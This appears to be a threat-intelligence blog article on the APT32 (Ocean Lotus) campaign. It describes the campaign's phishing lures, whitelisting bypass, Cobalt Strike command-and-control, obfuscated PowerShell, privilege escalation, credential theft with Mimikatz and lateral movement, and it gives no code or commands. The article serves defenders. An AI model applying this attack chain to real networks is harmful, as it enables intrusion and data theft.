APT32 (aka Ocean Lotus), a threat actor observed by FireEye since 2014 allegedly connected to the Vietnamese state, is targeting multinational businesses with interests in Vietnam, both from the private sector and from government-related institutions.
Among the victims, you can find technology infrastructure, network security, consulting firms, banking, media, hospitality, consumer products, government agencies, research institutes, maritime agencies, sea construction, shipping enterprises, and even journalists, activists, regime dissidents and bloggers.
According to the Vietnamese Ministry of Foreign Affairs spokeswoman, they condemn and deny any involvement related to APT32.
This unique APT group leverages “trendy” and newly-public cyber security techniques proven to be effective and stealthy. Their toolbox contains an exceptional number of capabilities tailor-made to bypass the victim’s security and move laterally until reaching their goal.
Initial Infection Vector
In their latest APT campaign, Ocean Lotus used spear-phishing email with attached ActiveMime files—tailor-made documents with double extensions such as “Instructions to GSIS.doc.mht”—disguised as a Word Document with OLE Macro codes. They lured the victim to enable macro in order to launch the actual deployer using embedded VB Code encoded as Base64 string. Once launched, it is decoded to PowerShell commands and SCHTASKS tool.
Another smart method utilized in this initial infection vector is “marketing” analysis. Using embedded images inside the mht code, they can see who has been lured to launch the mht file. With this marketing technique, the attacker gathers analytics data about the IP of the victims and statistics about how many victims have fallen into his trap.
The MHT deployer installs two scheduled tasks on its infected endpoint:
The first one is a COM scriptlet. Launched every 30 min, it uses a Windows Whitelisting Bypassing technique, released by SubTee, to avoid being blocked. This technique leverages a feature in regsvr32: downloading COM objects from a remote server and executing them using a signed Microsoft process, ultimately bypassing Application Whitelisting. The attacker downloads his Meterpreter Reverse Shell backdoor using this method from one of his servers. Once launched, it will inject itself into the memory, and then load Cobalt Strike’s BEACON, communicating with the threat actor’s C2 server using a method called Safebrowsing malleable C2 Profile. This method “masks” the C2 communication as legitimate custom-made HTTP traffic. For example, if you infiltrate an organization that uses AWS, you can create a C2 Profile to look like AWS HTTP communication.
The second scheduled task, launched every 50 min, executes PowerShell code disguised with the Invoke-Obfuscation method (released by Daniel Bohannon). The reason for using Invoke-Obfuscation is to avoid being blocked and detected by security products such as EDRs, Next-Gen AVs, and normal AVs.
This PowerShell code will act as a second backup backdoor—a trendy technique nowadays.
In some older cases, the attackers will create persistence spots as a Windows Service. It’s disguised as a name of a legitimate Microsoft service but with additional non-printed characters.
The C2 techniques used for the backdoor includes a variety of protocols such as DNS, ICMP, Safebrowsing HTTP, and Raw TCP Packets.
APT32 leverages multiple methods to gain higher privileges on the local computer it infected and the domain environment it created a foothold in. For local privileges, CVE-2016-7255 Privilege Escalation method was used to gain SYSTEM privileges. It affects all unpatched Windows OS since Windows 7 to Windows 10 1607 build.
For high-privileged domain credentials, the attacker uses Mimikatz to steal credentials and then leverages methods such as Pass-The-Hash, Pass-The-Ticket, and Overpass-The-Hash to use them in the domain. In several cases, the attacker utilized the “Local Admin Traversal” technique: using the same credentials of the Local Administrator accounts in the domain to perform lateral movement.
Reconnaissance and Lateral Movement
After the attacker creates a foothold on the machine, he performs both local host reconnaissance and Active Directory Domain reconnaissance to understand the environment he is in.
The next step is lateral movement—pivoting from one machine to another until reaching the final destination. In order to do that, the attacker uses many trendy techniques such as PowerShell commands, legitimate System Admin tools, and creating SMB Named Pipes in each machine he arrives in with Cobalt Strike’s SMB Named Pipes Peer-To-Peer C2 technique.
One unique method to spread malware is manipulating a McAfee ePO server. Compromising the ePO server in most cases will grant attackers full access to the whole domain. Leveraging the ePO’s agent, the attacker deploys his malware inside the ePO agent’s deployment system and gets direct access to every machine.
APT32 might be using up-to-date trendy techniques to achieve its goals, but the flow of the campaign is identical to all of the other APT campaigns discovered lately: initial infection using phishing, privilege escalation, reconnaissance, lateral movement, and, finally, exfiltration of stolen data. After infecting a computer and establishing a foothold, attackers take advantage of built-in capabilities (one of them being Active Directory) to discover where the crucial information is and how to take it. And because the Active Directory is vulnerable by design, it’s left unprotected.
Bypassing casual security solutions has become easy through the power of many. Using open-source Red Team tools is now more popular than ever before.